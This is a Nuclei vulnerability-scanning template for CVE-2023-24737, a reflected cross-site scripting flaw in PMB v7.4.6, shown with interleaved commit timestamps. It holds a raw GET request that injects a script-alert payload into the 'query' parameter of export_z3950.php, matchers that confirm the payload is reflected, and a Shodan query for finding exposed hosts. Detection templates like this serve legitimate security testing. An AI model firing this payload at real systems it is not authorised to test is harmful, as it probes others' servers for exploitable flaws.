2023-03-31 11:28:24 +00:00
|
|
|
id: CVE-2023-24737
|
|
|
|
|
|
|
|
info:
|
2023-04-28 13:11:35 +00:00
|
|
|
name: PMB v7.4.6 - Cross-Site Scripting
|
2023-03-31 11:28:24 +00:00
|
|
|
author: r3Y3r53
|
|
|
|
severity: medium
|
|
|
|
description: |
|
2023-04-28 13:11:35 +00:00
|
|
|
PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.
|
2023-03-31 11:28:24 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md
|
2023-03-31 16:11:22 +00:00
|
|
|
- https://github.com/AetherBlack/CVE/tree/main/PMB
|
2023-04-28 13:11:35 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-24737
|
2023-03-31 11:28:24 +00:00
|
|
|
classification:
|
2023-04-28 13:11:35 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 5.4
|
|
|
|
cwe-id: CWE-80
|
2023-03-31 11:28:24 +00:00
|
|
|
cve-id: CVE-2023-24737
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:pmb_project:pmb:*:*:*:*:*:*:*:*
|
|
|
|
epss-score: 0.00096
|
2023-03-31 11:28:24 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2023-03-31 11:28:24 +00:00
|
|
|
shodan-query: http.favicon.hash:1469328760
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-03-31 11:28:24 +00:00
|
|
|
tags: cve,cve2023,xss,pmb
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2023-03-31 11:28:24 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '3@1=<script>alert(document.domain)</script>'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-04-28 13:11:35 +00:00
|
|
|
|
|
|
|
# Enhanced by cs 04/25/2023
|